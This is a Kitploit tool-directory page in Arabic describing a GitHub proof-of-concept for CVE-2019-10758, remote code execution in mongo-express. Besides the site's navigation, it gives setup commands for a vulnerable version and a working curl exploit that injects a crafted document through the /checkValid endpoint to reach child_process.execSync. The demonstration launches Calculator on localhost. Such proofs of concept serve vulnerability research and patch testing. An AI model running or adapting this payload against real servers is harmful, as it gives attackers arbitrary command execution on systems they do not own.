Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-10758 — استغلال إثبات المفهوم لـ CVE-2019-10758، يوضح تنفيذ التعليمات البرمجية عن بُعد في mongo-express عبر حقن مستندات مصممة. يتضمن حمولات curl وقائمة على البرامج النصية. | Kitploit
أدوات/GitHubGitHub/masahiro331/cve-2019-10758
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmasahiro331/cve-2019-10758

CVE-2019-10758

استغلال إثبات المفهوم لـ CVE-2019-10758، يوضح تنفيذ التعليمات البرمجية عن بُعد في mongo-express عبر حقن مستندات مصممة. يتضمن حمولات curl وقائمة على البرامج النصية.

عرض المستودع
111218منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-10758 إثبات المفهوم

الإعداد

docker run -p 27017:27017 -d mongo
npm install [email protected] 
cd node_modules/mongo-express/ && node app.js

استغلال cURL

curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

استغلال عبر السكربت

node main.js
تنزيل الأداة